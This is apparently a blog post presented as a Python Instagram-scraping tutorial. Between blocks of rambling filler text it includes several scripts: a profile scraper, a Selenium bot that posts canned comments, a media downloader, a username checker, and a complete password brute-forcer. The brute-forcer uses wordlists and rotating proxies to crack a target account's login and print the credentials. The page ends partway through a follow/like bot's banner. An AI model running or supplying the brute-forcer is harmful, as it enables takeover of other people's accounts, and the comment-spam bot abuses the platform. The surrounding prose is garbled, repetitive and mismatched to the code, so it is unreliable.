Instagram Scraper – How to Scrape Instagram Using Python 2022

Top Python Scripts to Scrape Instagram using Python:

Instagram Scraper Python

Instagram scraper python is an open-source python library that helps you to extract interested posts from Instagram. It has a simple and easy-to-use interface that makes it perfect for scraping.

 

1. Instagram scraper – how to do it:

How to use Instagram scraper to get all the posts from a particular account Instagram is a social media platform where users share pictures and videos of their everyday lives. Many users use Instagram to promote their businesses or to share pictures of their beautiful homes. Many people use Instagram to promote their businesses or to share pictures of their beautiful homes. However, it can be difficult to find all the posts from a particular account on Instagram. One way to get all the posts from a particular account on Instagram is to use a Instagram scraper. A Instagram scraper is a software program that helps you search for and extract all the posts from a particular account. To use a Instagram scraper to get all the posts from a particular account, you first need to find the Instagram account that you want to extract posts from. You can find the Instagram account name and address on the Instagram website or on the account’s profile page on Instagram.

 

import os
import time
import stdiomask
import platform
try:
    import requests
    from colorama import init, Fore
except ModuleNotFoundError:
    os.system('pip install requests')
    import requests
    os.system('pip install colorama')
    from colorama import init, Fore

os.system("cls" if platform.system() == "Windows" else "clear")
init(autoreset=True)
r = requests.Session()

class Scraper:
    def __init__(self):
        pass

    def login(self, username, password):
        headers = {
            "user-agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36",
            "x-csrftoken": "dydX2TKkziQrOxp816zLjSyxmQYCukzC",
            "content-type": "application/x-www-form-urlencoded"
        }

        url = "https://www.instagram.com/accounts/login/ajax/"

        data = {
            "enc_password": "#PWD_INSTAGRAM_BROWSER:0:1662950310:" + password,
            "username": username,
            "queryParams": "{}"
        }

        login = r.post(url, headers=headers, data=data)
        r.cookies = login.cookies

        if 'userId' in login.text:
            print(f"\n[{Fore.LIGHTGREEN_EX}+{Fore.RESET}] Successfully Logged In")
            time.sleep(2)
        else:
            print(f"\n[{Fore.LIGHTRED_EX}+{Fore.RESET}] Wrong Username/Password")
            time.sleep(3)
            exit()

    def scraper(self, target):
            headers = {
                "user-agent": "Instagram 85.0.0.21.100 Android (28/9; 380dpi; 1080x2147; OnePlus; HWEVA; OnePlus6T; qcom; en_US; 146536611)",
                "x-csrftoken": "fbMty08hNS2evXP6EB4IsnFqoIUjGPB7"
            }

            target_info = f"https://i.instagram.com/api/v1/users/web_profile_info/?username={target}"

            user_info = r.get(target_info, headers=headers)
            # DATA

            time.sleep(2)
            userId = user_info.json()["data"]["user"]["id"]
            username = user_info.json()["data"]["user"]["username"]
            pfp_url = user_info.json()["data"]["user"]["profile_pic_url_hd"]
            is_private = user_info.json()["data"]["user"]["is_private"]
            is_verified = user_info.json()["data"]["user"]["is_verified"]
            is_joined_recently = user_info.json()["data"]["user"]["is_joined_recently"]
            full_name = user_info.json()["data"]["user"]["full_name"]
            biography = user_info.json()["data"]["user"]["biography_with_entities"]["raw_text"]
            external_url = user_info.json()["data"]["user"]["external_url"]
            posts = user_info.json()["data"]["user"]["edge_owner_to_timeline_media"]["count"]
            followers = user_info.json()["data"]["user"]["edge_followed_by"]["count"]
            following = user_info.json()["data"]["user"]["edge_follow"]["count"]
            scraper_info = f"""
[{Fore.LIGHTGREEN_EX}userId{Fore.RESET}]: {userId}
[{Fore.LIGHTGREEN_EX}Username{Fore.RESET}]: {username}
[{Fore.LIGHTGREEN_EX}Profile Picture{Fore.RESET}]: {pfp_url}
[{Fore.LIGHTGREEN_EX}Is Private{Fore.RESET}]: {is_private}
[{Fore.LIGHTGREEN_EX}Is Verified{Fore.RESET}]: {is_verified}
[{Fore.LIGHTGREEN_EX}Is Joined Recently{Fore.RESET}]: {is_joined_recently}
[{Fore.LIGHTGREEN_EX}Full Name{Fore.RESET}]: {full_name}
[{Fore.LIGHTGREEN_EX}Biography{Fore.RESET}]: {biography}
[{Fore.LIGHTGREEN_EX}External URL{Fore.RESET}]: {external_url}
[{Fore.LIGHTGREEN_EX}Posts Count{Fore.RESET}]: {posts}
[{Fore.LIGHTGREEN_EX}Followers Count{Fore.RESET}]: {followers}
[{Fore.LIGHTGREEN_EX}Following Count{Fore.RESET}]: {following}
            """

            print(scraper_info)

scraper = Scraper()

def main():
    login_logo = f"""{Fore.LIGHTCYAN_EX}
   __             _       
  / /  ___   __ _(_)_ __  
 / /  / _ \ / _` | | '_ \ 
/ /__| (_) | (_| | | | | |
\____/\___/ \__, |_|_| |_|
            |___/          {Fore.RESET} \n
    """
    print(login_logo)
    username = input(f"[{Fore.LIGHTRED_EX}+{Fore.RESET}] Username: ")
    password = stdiomask.getpass(prompt=f"[{Fore.LIGHTRED_EX}+{Fore.RESET}] {Fore.RESET}Password: ", mask='*')

    scraper.login(username=username, password=password)

    os.system("cls" if platform.system() == "Windows" else "clear")
    
    while True:
        scraper_logo = f""" {Fore.LIGHTCYAN_EX}
 __                                
/ _\ ___ _ __ __ _ _ __   ___ _ __ 
\ \ / __| '__/ _` | '_ \ / _ \ '__|
_\ \ (__| | | (_| | |_) |  __/ |   
\__/\___|_|  \__,_| .__/ \___|_|   
                  |_|      {Fore.RESET} \n           
"""
        print(scraper_logo)
        target = input(f"[{Fore.LIGHTRED_EX}+{Fore.RESET}] Target: ")

        scraper.scraper(target=target)


if __name__ == '__main__':
    main()

2. Instagram scraper – tips and tricks:

If you’re looking to get started with Instagram scraper, here are a few tips and tricks to keep in mind: 1. Use a scraper that’s optimized for Instagram. There are a few popular Instagram scrapers available online, such as Hootsuite’s Instagram Scraper and SumoMe’s SumoMe Instagram Scraper. These scrapers can help you grab all the relevant information from your Instagram account in a matter of minutes. 2. Use a scraper that can auto-detect your account’s URL. Some of the best Instagram scrapers include features that can automatically detect your account’s URL and import all of your posts and images. This makes it easy to get started scraping your account right away. 3. Organize your data. Once you’ve scraped your account, it’s important to organize your data in a way that makes sense. Use a data-visualization tool like Tableau to help you analyze your data.

 

Instagram Auto Comment Script:

3. Instagram scraper – advanced usage

Instagram is a popular social media platform with over 1 billion active users. It allows users to share photos and videos with friends, followers, and other users who follow them. Many Instagram users use third-party apps to scrape the content of their account. A scraper is a computer program that collects content from a web page or other source, like Instagram. Scrapers can be used for a variety of purposes, such as finding and harvesting images for use in a blog post or website, or finding and mining data from a social media platform. There are a number of different ways to use a scraper on Instagram. One way is to use a browser extension. Chrome and Firefox both have extensions that can be used to scrape images from Instagram. Another way to use a scraper is to use a dedicated app. The most popular app for this is Instagress. Instagress is a dedicated app that can be used to scrape images from Instagram.

 

from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.common.by import By
from time import sleep

driver = webdriver.Chrome()
driver.get('https://www.instagram.com')
sleep(1)
a = input("Enter your Instagram Username")
b = input("Enter your Instagram Password")
driver.find_element_by_name('username').send_keys(a)  #enter your insta acc
driver.find_element_by_name('password').send_keys(b) #enter your insta acc 
#note no two factor authentication is on when automation goes create another insta acc
sleep(1)
driver.find_element_by_xpath("//button[@type='submit']").click()
sleep(3)
driver.get("https://www.instagram.com/p/CiRXFqzvOi-/?utm_source=ig_web_copy_link") #replace with your needed post url
sleep(2)
driver.find_element(By.XPATH,'//*[@class ="_aao9"]//textarea').click()
sleep(1)
driver.find_element(By.XPATH,'//*[@class ="_aao9"]//textarea').send_keys("amazing") #change text to your required and do in below also
sleep(1)
driver.find_element(By.XPATH,'//*[@class ="_aao9"]//button[@type="submit"]').click()

sleep(7)

driver.find_element(By.XPATH,'//*[@class ="_aao9"]//textarea').click()
sleep(1)
driver.find_element(By.XPATH,'//*[@class ="_aao9"]//textarea').send_keys("progress")
sleep(1)
driver.find_element(By.XPATH,'//*[@class ="_aao9"]//button[@type="submit"]').click()

sleep(7)

driver.find_element(By.XPATH,'//*[@class ="_aao9"]//textarea').click()
sleep(1)
driver.find_element(By.XPATH,'//*[@class ="_aao9"]//textarea').send_keys("trying to new idea")
sleep(1)
driver.find_element(By.XPATH,'//*[@class ="_aao9"]//button[@type="submit"]').click()

sleep(7)

driver.find_element(By.XPATH,'//*[@class ="_aao9"]//textarea').click()
sleep(1)
driver.find_element(By.XPATH,'//*[@class ="_aao9"]//textarea').send_keys("amazing")
sleep(1)
driver.find_element(By.XPATH,'//*[@class ="_aao9"]//button[@type="submit"]').click()

sleep(8)

driver.find_element(By.XPATH,'//*[@class ="_aao9"]//textarea').click()
sleep(1)
driver.find_element(By.XPATH,'//*[@class ="_aao9"]//textarea').send_keys("fabulous")
sleep(1)
driver.find_element(By.XPATH,'//*[@class ="_aao9"]//button[@type="submit"]').click()

sleep(8)

driver.find_element(By.XPATH,'//*[@class ="_aao9"]//textarea').click()
sleep(1)
driver.find_element(By.XPATH,'//*[@class ="_aao9"]//textarea').send_keys("superb")
sleep(1)
driver.find_element(By.XPATH,'//*[@class ="_aao9"]//button[@type="submit"]').click()

sleep(8)

driver.find_element(By.XPATH,'//*[@class ="_aao9"]//textarea').click()
sleep(1)
driver.find_element(By.XPATH,'//*[@class ="_aao9"]//textarea').send_keys("excellent")
sleep(1)
driver.find_element(By.XPATH,'//*[@class ="_aao9"]//button[@type="submit"]').click()

sleep(8)

driver.find_element(By.XPATH,'//*[@class ="_aao9"]//textarea').click()
sleep(1)
driver.find_element(By.XPATH,'//*[@class ="_aao9"]//textarea').send_keys("marvelous")
sleep(1)
driver.find_element(By.XPATH,'//*[@class ="_aao9"]//button[@type="submit"]').click()

sleep(8)

driver.find_element(By.XPATH,'//*[@class ="_aao9"]//textarea').click()
sleep(1)
driver.find_element(By.XPATH,'//*[@class ="_aao9"]//textarea').send_keys("awesome")
sleep(1)
driver.find_element(By.XPATH,'//*[@class ="_aao9"]//button[@type="submit"]').click()

sleep(7)

driver.find_element(By.XPATH,'//*[@class ="_aao9"]//textarea').click()
sleep(1)
driver.find_element(By.XPATH,'//*[@class ="_aao9"]//textarea').send_keys("excellent")
sleep(1)
driver.find_element(By.XPATH,'//*[@class ="_aao9"]//button[@type="submit"]').click()

sleep(30)

Instagram Download Reels and Posts:

4. Instagram scraper – for developers

Instagram is a popular photo and video-sharing social media platform with more than 1 billion active monthly users. It has a large and ever-growing community of developers who use its APIs to build various applications. One such application is an Instagram scraper – a software that extracts all the posts from a user’s account and stores them in a database. This scraper can then be used by developers to study and analyze the Instagram community in order to create new applications or to improve existing ones. The scraper is particularly useful for researchers who want to study the behavior of the Instagram community and for marketers who want to target specific users. It can also be used by developers to analyze the behavior of their own accounts and to improve them.

 

from datetime import datetime
from tqdm import tqdm
import requests
import re
import sys
import tkinter as tk
from tkinter import *
from tkinter import messagebox as mb
import webbrowser

def callback(event):
    webbrowser.open_new(event.widget.cget("text"))

def call():
    res = mb.askquestion('Exit Application', 
                         'Do you really want to exit')
      
    if res == 'yes' :
        root.destroy()
          
    else :
        mb.showinfo('Return', 'Returning to Login Box')
  
root = tk.Tk()
root.title("Login Instagram Box")

lb1 = tk.Button(root, text = "Welcome", font=("Algerian", 21, "bold"), fg = "yellow", bg = "red")
lb1.pack()

lb2 = tk.Label(root, text = "Hey Folk, please click here to login to Instagram and proceed!!", font = ("Monotype Corsiva", 25, "bold"), fg = "green")
lb2.pack()

lb3 = tk.Label(root, text = "http://www.instagram.com", font = ("Algerian", 25, "bold"), fg="blue", cursor="hand2")
lb3.pack()
lb3.bind("<Button-1>", callback)

lb4 = tk.Label(root, text = "Please quit application if already logged in and proceed!!", font = ("Monotype Corsiva", 25, "bold"), fg = "green")
lb4.pack()

lb5 = tk.Button(root, text = 'Quit Application', font = ("Algerian", 21, "bold"), fg = "yellow", bg = "red", command=call)
lb5.pack()

root.mainloop()


print('''
                        [WELCOME TO INSTASTORE]\n        [PRESENTING THE INSTAGRAM PHOTO AND VIDEO DOWNLOADER]              
                        
''')                ##  Heading

##  Function to check the Internet Connection
def internet(url='https://www.google.com/', timeout=5):
    try:
        req = requests.get(url, timeout=timeout)
        req.raise_for_status()
        print("You're connected to Internet successfully. You can proceed to your work!!\n")
        return True
    except requests.HTTPError as e: 
        print("Checking internet connection failed, status code {0}.".format(e.response.status_code))
    except requests.ConnectionError:
        print("No internet connection available. Please provide an Internet connection to proceed!!")
        input("\nPress Enter to close")
    return False

##  Function to download an Instagram Photo
def download_photo():
    
    url = input("\nPlease enter your desired Image URL from your Instagram profile: \n")
    x = re.match(r'^(https:)[/][/]www.([^/]+[.])*instagram.com', url)

    try:
        if x:
            request_image = requests.get(url)   ##  requests and get the url
            src = request_image.content.decode('utf-8')
            check_type = re.search(r'<meta name="medium" content=[\'"]?([^\'" >]+)', src)
            check_type_f = check_type.group()
            final = re.sub('<meta name="medium" content="', '', check_type_f)

            if final == "image":
                print("\nDownloading the image...")
                extract_image_link = re.search(r'meta property="og:image" content=[\'"]?([^\'" >]+)', src)
                image_link = extract_image_link.group()
                final = re.sub('meta property="og:image" content="', '', image_link)
                _response = requests.get(final).content
                file_size_request = requests.get(final, stream=True)
                file_size = int(file_size_request.headers['Content-Length'])
                block_size = 1024
                filename = datetime.strftime(datetime.now(), '%Y-%m-%d-%H-%M-%S')
                t=tqdm(total=file_size, unit='B', unit_scale=True, desc=filename, ascii=True)
                with open(filename + '.jpg', 'wb') as f:    
                    for data in file_size_request.iter_content(block_size):
                        t.update(len(data))
                        f.write(data)
                t.close()
                print("\nImage downloaded successfully!!")
                print("\n          THANKS FOR VISITING!! HAVE A NICE DAY AHEAD!!\n\nKINDLY PROVIDE YOUR FEEDBACK OR CONTRIBUTIONS IN PROVIDED LINK IF INTERESTED!! ")
                print("             https://github.com/Rakesh9100/InstaStore")

        else:
            print("Entered URL is not an instagram.com URL.")
    except AttributeError:
        print("Unknown URL!!")

##  Function to download an Instagram Video
def download_video():

    url = input("\nPlease enter your desired Video URL from your Instagram profile: \n")
    x = re.match(r'^(https:)[/][/]www.([^/]+[.])*instagram.com', url)

    try:
        if x:
            request_image = requests.get(url)
            src = request_image.content.decode('utf-8')
            check_type = re.search(r'<meta name="medium" content=[\'"]?([^\'" >]+)', src)
            check_type_f = check_type.group()
            final = re.sub('<meta name="medium" content="', '', check_type_f)

            if final == "video":
                print("\nDownloading the video...")
                extract_video_link = re.search(r'meta property="og:video" content=[\'"]?([^\'" >]+)', src)
                video_link = extract_video_link.group()
                final = re.sub('meta property="og:video" content="', '', video_link)
                _response = requests.get(final).content
                file_size_request = requests.get(final, stream=True)
                file_size = int(file_size_request.headers['Content-Length'])
                block_size = 1024
                filename = datetime.strftime(datetime.now(), '%Y-%m-%d-%H-%M-%S')
                t=tqdm(total=file_size, unit='B', unit_scale=True, desc=filename, ascii=True)
                with open(filename + '.mp4', 'wb') as f:
                    for data in file_size_request.iter_content(block_size):
                        t.update(len(data))
                        f.write(data)
                t.close()
                print("\nVideo downloaded successfully!!")
                print("\n          THANKS FOR VISITING!! HAVE A NICE DAY AHEAD!!\n\nKINDLY PROVIDE YOUR FEEDBACK OR CONTRIBUTIONS IN PROVIDED LINK IF INTERESTED!! ")
                print("             https://github.com/Rakesh9100/InstaStore")
        else:
            print("Entered URL is not an instagram.com URL.")
    except AttributeError:
        print("Unknown URL!!")

## Function to download an Instagram Profile Picture
import instaloader
def download_dp():
    
    ig = instaloader.Instaloader()  # Create instance
    user = input("Please enter your Instagram Username: ")
    ig.download_profile(user, profile_pic_only = True)  # download profile
    print("\nProfile Photo downloaded successfully!!")
    print("\n          THANKS FOR VISITING!! HAVE A NICE DAY AHEAD!!\n\nKINDLY PROVIDE YOUR FEEDBACK OR CONTRIBUTIONS IN PROVIDED LINK IF INTERESTED!! ")
    print("             https://github.com/Rakesh9100/InstaStore")

if internet() == True:
    try:
        while True:
            print("Press 'A' or 'a' to download your Instagram Photo.\nPress 'B' or 'b' to download your Instagram Video. "
                  "\nPress 'C' or 'c' to download your Instagram Profile Picture.\nPress 'E' or 'e' to Exit.")
            select = str(input("\nINSTA DOWNLOADER --> "))
            try:
                if select == 'A' or select == 'a':
                    download_photo()
                    input("\nPress Enter to close ")
                if select == 'B' or select == 'b':
                    download_video()
                    input("\nPress Enter to close ")
                if select == 'C' or select == 'c':
                    download_dp()
                    input("\nPress Enter to close ")
                if select == 'E' or select == 'e':
                    print("\n          THANKS FOR VISITING!! HAVE A NICE DAY AHEAD!!\n\nKINDLY PROVIDE YOUR FEEDBACK OR CONTRIBUTIONS IN PROVIDED LINK IF INTERESTED!! ")
                    print("             https://github.com/Rakesh9100/InstaStore")
                    input("\nPress Enter to close ")
                    sys.exit()
                else:
                    sys.exit()
            except (KeyboardInterrupt):
                print("Programme Interrupted")
    except(KeyboardInterrupt):
        print("\nProgramme Interrupted")
else:
    sys.exit()

Instagram Username Checker:

5. Instagram scraper – for business users

Instagram scraper is a tool that business users can use to collect data from Instagram. The tool can be used to collect data such as user profiles, posts, and images. The scraper can be used to collect data from a single account or from a collection of accounts. The scraper can also be used to collect data for a specific time period or for a specific location.

Instagram scraper is a powerful software that can help marketers to collect all the valuable data from Instagram. It helps to extract all the posts, images, hashtags, and users that are mentioned in a given time period. This is a great tool for market research, as it allows you to get a comprehensive picture of what is being said about your brand and products on Instagram.

 

import requests, os
from pystyle import Colors
from threading import Thread
os.system('cls||clear')
print(f""" 
{Colors.blue}//{Colors.white} IG Username Checker 
""")
print("")
username_file = input(f"{Colors.blue}\{Colors.reset}?{Colors.blue}\{Colors.reset} Usernames File: ")
availablecount = 0
takencount = 0
errorcount = 0
def title():  
    while True:
        os.system(f"title Taken:{[takencount]}   Available:{[availablecount]}  Errors:{[errorcount]}")
def check():
 try:
  while True:
   openusers = open(username_file,"r").read().splitlines()
   for username in openusers:
    global availablecount, takencount, errorcount
    re = requests.post(f'https://instagram.com/{username}')
    if re.text.find(',"target_id":"') >= 0:
     takencount +=1
     print(f"/{Colors.red}X{Colors.reset}/ Taken: [{username}]")
    elif re.text == '':
     errorcount +=1
    else:
     availablecount +=1
     print(f"/{Colors.green}+{Colors.reset}/ Available: [{username}]")
 except:
  errorcount +=1
  pass
Thread(target=(title)).start()
Thread(target=(check)).start()

Instagram Cracker Master Script:

6. Instagram scraper – for photographers

Instagram is a popular photo sharing platform with over 800 million active users. With so many photos being posted every day, it can be hard to find the specific photo you are looking for. A popular tool for finding photos on Instagram is a scraper. A scraper is a software that collects data from websites and extracts specific information from it, such as photos and their metadata. A scraper for Instagram was created by a software engineer named John. John’s scraper is a free tool that collects data from Instagram and stores it in a database. The scraper is available on GitHub, and can be downloaded by anyone. The scraper is designed to be used by photographers who want to find specific photos of their clients or products. The scraper can be used to find photos of any size, and can be configured to search for specific keywords. The scraper can also be used to find photos that have been deleted from Instagram.

 

from __future__ import print_function
import argparse
import logging
import random
import socket
import sys
import threading

try:
    import urllib.request as rq
    from urllib.error import HTTPError
    import urllib.parse as http_parser
except ImportError:
    import urllib2 as rq
    from urllib2 import HTTPError
    import urllib as http_parser

try:
    import Queue
except ImportError:
    import queue as Queue


class bcolors:
    HEADER = '\033[94m'
    OKGREEN = '\033[92m'
    WARNING = '\033[93m'
    FAIL = '\033[91m'
    ENDC = '\033[0m'
    BOLD = '\033[1m'
    UNDERLINE = '\033[4m'


def check_proxy(q):
    """
    check proxy for and append to working proxies
    :param q:
    """
    if not q.empty():

        proxy = q.get(False)
        proxy = proxy.replace("\r", "").replace("\n", "")

        try:
            opener = rq.build_opener(
                rq.ProxyHandler({'https': 'https://' + proxy}),
                rq.HTTPHandler(),
                rq.HTTPSHandler()
            )

            opener.addheaders = [('User-agent', 'Mozilla/5.0')]
            rq.install_opener(opener)

            req = rq.Request('https://api.ipify.org/')

            if rq.urlopen(req).read().decode() == proxy.partition(':')[0]:
                proxys_working_list.update({proxy: proxy})
                if _verbose:
                    print(bcolors.OKGREEN + " --[+] ", proxy, " | PASS" + bcolors.ENDC)
            else:
                if _verbose:
                    print(" --[!] ", proxy, " | FAILED")

        except Exception as err:
            if _verbose:
                print(" --[!] ", proxy, " | FAILED")
            if _debug:
                logger.error(err)
            pass


def get_csrf():
    """
    get CSRF token from login page to use in POST requests
    """
    global csrf_token

    print(bcolors.WARNING + "[+] Getting CSRF Token: " + bcolors.ENDC)

    try:
        opener = rq.build_opener(rq.HTTPHandler(), rq.HTTPSHandler())
        opener.addheaders = [('User-agent', 'Mozilla/5.0')]
        rq.install_opener(opener)

        request = rq.Request('https://www.instagram.com/')
        try:
            # python 2
            headers = rq.urlopen(request).info().headers
        except Exception:
            # python 3
            headers = rq.urlopen(request).info().get_all('Set-Cookie')

        for header in headers:
            if header.find('csrftoken') != -1:
                csrf_token = header.partition(';')[0].partition('=')[2]
                print(bcolors.OKGREEN + "[+] CSRF Token :", csrf_token, "\n" + bcolors.ENDC)
    except Exception as err:
        print(bcolors.FAIL + "[!] Can't get CSRF token , please use -d for debug" + bcolors.ENDC)

        if _debug:
            logger.error(err)

        print(bcolors.FAIL + "[!] Exiting..." + bcolors.ENDC)
        exit(3)


def brute(q):
    """
    main worker function
    :param word:
    :param event:
    :return:
    """
    if not q.empty():
        try:
            proxy = None
            if len(proxys_working_list) != 0:
                proxy = random.choice(list(proxys_working_list.keys()))

            word = q.get()
            word = word.replace("\r", "").replace("\n", "")

            post_data = {
                'username': USER,
                'password': word,
            }

            header = {
                "User-Agent": random.choice(user_agents),
                'X-Instagram-AJAX': '1',
                "X-CSRFToken": csrf_token,
                "X-Requested-With": "XMLHttpRequest",
                "Referer": "https://www.instagram.com/",
                "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
                'Cookie': 'csrftoken=' + csrf_token
            }

            if proxy:
                if _verbose:
                    print(bcolors.BOLD + "[*] Trying %s %s " % (word, " | " + proxy,) + bcolors.ENDC)

                opener = rq.build_opener(
                    rq.ProxyHandler({'https': 'https://' + proxy}),
                    rq.HTTPHandler(),
                    rq.HTTPSHandler()
                )

            else:
                if _verbose:
                    print(bcolors.BOLD + "[*] Trying %s" % (word,) + bcolors.ENDC)

                opener = rq.build_opener(
                    rq.HTTPHandler(),
                    rq.HTTPSHandler()
                )

            rq.install_opener(opener)

            req = rq.Request(URL, data=http_parser.urlencode(post_data).encode('ascii'), headers=header)
            sock = rq.urlopen(req)

            if sock.read().decode().find('"authenticated": true') != -1:
                print(bcolors.OKGREEN + bcolors.BOLD + "\n[*]Successful Login:")
                print("---------------------------------------------------")
                print("[!]Username: ", USER)
                print("[!]Password: ", word)
                print("---------------------------------------------------\n" + bcolors.ENDC)
                found_flag = True
                q.queue.clear()
                q.task_done()

        except HTTPError as e:
            if e.getcode() == 400 or e.getcode() == 403:
                if e.read().decode("utf8", 'ignore').find('"checkpoint_required"') != -1:
                    print(bcolors.OKGREEN + bcolors.BOLD + "\n[*]Successful Login "
                          + bcolors.FAIL + "But need Checkpoint :|" + bcolors.OKGREEN)
                    print("---------------------------------------------------")
                    print("[!]Username: ", USER)
                    print("[!]Password: ", word)
                    print("---------------------------------------------------\n" + bcolors.ENDC)
                    found_flag = True
                    q.queue.clear()
                    q.task_done()
                    return
                elif proxy:
                    print(bcolors.WARNING +
                          "[!]Error: Proxy IP %s is now on Instagram jail ,  Removing from working list !" % (proxy,)
                          + bcolors.ENDC
                          )
                    if proxy in proxys_working_list:
                        proxys_working_list.pop(proxy)
                    print(bcolors.OKGREEN + "[+] Online Proxy: ", str(len(proxys_working_list)) + bcolors.ENDC)
                else:
                    print(bcolors.FAIL + "[!]Error : Your Ip is now on Instagram jail ,"
                          " script will not work fine until you change your ip or use proxy" + bcolors.ENDC)
            else:
                print("Error:", e.getcode())

            q.task_done()
            return

        except Exception as err:
            if _debug:
                print(bcolors.FAIL + "[!] Unknown Error in request." + bcolors.ENDC)
                logger.error(err)
            else:
                print(bcolors.FAIL + "[!] Unknown Error in request, please turn on debug mode with -d" + bcolors.ENDC)

            pass
            return


def starter():
    """
    threading workers initialize
    """
    global found_flag

    queue = Queue.Queue()
    threads = []
    max_thread = THREAD
    found_flag = False

    queuelock = threading.Lock()

    print(bcolors.HEADER + "\n[!] Initializing Workers")
    print("[!] Start Cracking ... \n" + bcolors.ENDC)

    try:
        for word in words:
            queue.put(word)
        while not queue.empty():
            queuelock.acquire()
            for workers in range(max_thread):
                t = threading.Thread(target=brute, args=(queue,))
                t.setDaemon(True)
                t.start()
                threads.append(t)
            for t in threads:
                t.join()
            queuelock.release()
            if found_flag:
                break
        print(bcolors.OKGREEN + "\n--------------------")
        print("[!] Brute complete !" + bcolors.ENDC)

    except Exception as err:
        print(err)


def check_avalaible_proxys(proxys):
    """
        check avalaible proxyies from proxy_list file
    """
    socket.setdefaulttimeout(30)

    global proxys_working_list
    print(bcolors.WARNING + "[-] Testing Proxy List...\n" + bcolors.ENDC)

    proxys_working_list = {}
    max_thread = THREAD

    queue = Queue.Queue()
    queuelock = threading.Lock()
    threads = []

    for proxy in proxys:
        queue.put(proxy)

    while not queue.empty():
        queuelock.acquire()
        for workers in range(max_thread):
            t = threading.Thread(target=check_proxy, args=(queue,))
            t.setDaemon(True)
            t.start()
            threads.append(t)
        for t in threads:
            t.join()
        queuelock.release()

    print(bcolors.OKGREEN + "[+] Online Proxy: " + bcolors.BOLD + str(len(proxys_working_list)) + bcolors.ENDC + "\n")


if __name__ == "__main__":

    parser = argparse.ArgumentParser(
        description="Instagram BruteForcer",
        epilog="./instabrute -u user_test -w words.txt -p proxys.txt -t 4 -d -v"
    )

    # required argument
    parser.add_argument('-u', '--username', action="store", required=True,
                        help='Target Username')
    parser.add_argument('-w', '--word', action="store", required=True,
                        help='Words list path')
    parser.add_argument('-p', '--proxy', action="store", required=True,
                        help='Proxy list path')
    # optional arguments
    parser.add_argument('-t', '--thread', help='Thread', type=int, default=4)
    parser.add_argument('-v', '--verbose', action='store_const', help='Thread', const=True, default=False)
    parser.add_argument('-d', '--debug', action='store_const', const=True, help='Debug mode', default=False)

    args = parser.parse_args()

    URL = "https://www.instagram.com/accounts/login/ajax/"
    USER = args.username
    THREAD = args.thread
    _verbose = args.verbose
    _debug = args.debug

    user_agents = ["Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)",
                   "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko)",
                   "Mozilla/5.0 (Linux; U; Android 2.3.5; en-us; HTC Vision Build/GRI40) AppleWebKit/533.1",
                   "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko)",
                   "Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:2.2) Gecko/20110201",
                   "Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0",
                   "Mozilla/5.0 (Windows; U; MSIE 9.0; WIndows NT 9.0; en-US))"]

    try:
        words = open(args.word).readlines()
    except IOError:
        print("[-] Error: Check your word list file path\n")
        sys.exit(1)

    try:
        proxys = open(args.proxy).readlines()
    except IOError:
        print("[-] Error: Check your proxy list file path\n")
        sys.exit(1)

    # enable debugging if its set
    if _debug:
        # Logging stuff
        logging.basicConfig(level=logging.DEBUG, filename="log",
                            format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')
        logger = logging.getLogger(__name__)

    print(bcolors.HEADER + """.-------------------------------------------------------.""")
    print("""
# Instagram : @Khode_Kia
# Developed By Mr.Ghanbari
# Khode_Kia[at]Yahoo[dot]Com
""")


    print(bcolors.OKGREEN + "[+] Username Loaded:", bcolors.BOLD + USER + bcolors.ENDC)
    print(bcolors.OKGREEN + "[+] Words Loaded:", bcolors.BOLD + str(len(words)) + bcolors.ENDC)
    print(bcolors.OKGREEN + "[+] Proxy Loaded:", bcolors.BOLD + str(len(proxys)) + bcolors.ENDC)
    print(bcolors.ENDC)

    check_avalaible_proxys(proxys)
    get_csrf()
    starter()

 

Follow, Unfollow, Like, Comment Bot:

7. Instagram scraper – for bloggers

I was browsing Instagram one day, and I saw a post that was really interesting. It was a photo of a bowl of ice cream with a really interesting caption. I wanted to know more about the bowl of ice cream, so I started researching it. I found out that the bowl of ice cream was made by a really famous ice cream shop in town. I was really interested in learning more about the ice cream shop, so I started searching for information about it on the internet. I found out that the ice cream shop was founded by a really famous chef, and that it was one of the most popular restaurants in town. I was really impressed by the restaurant, and I wanted to learn more about it. I found out that the chef had started the restaurant as a way to combine his love of cooking and his love of ice cream. I was really excited to learn more about the chef, and I decided to search for information about him on the internet.

import os
import threading
import requests
import pystyle
from pystyle import *

from itertools import cycle

Title = print("""
β–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—  β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—  β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—  β–ˆβ–ˆβ–ˆβ•—   β–ˆβ–ˆβ–ˆβ•—β€ƒβ€ƒβ€ƒβ€ƒβ€ƒβ€ƒβ€ƒβ€ƒ
β–ˆβ–ˆβ•‘β–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β•β•β•β•šβ•β•β–ˆβ–ˆβ•”β•β•β•β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β•β•β• β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ•‘β€ƒβ€ƒβ€ƒβ€ƒβ€ƒβ€ƒβ€ƒβ€ƒ
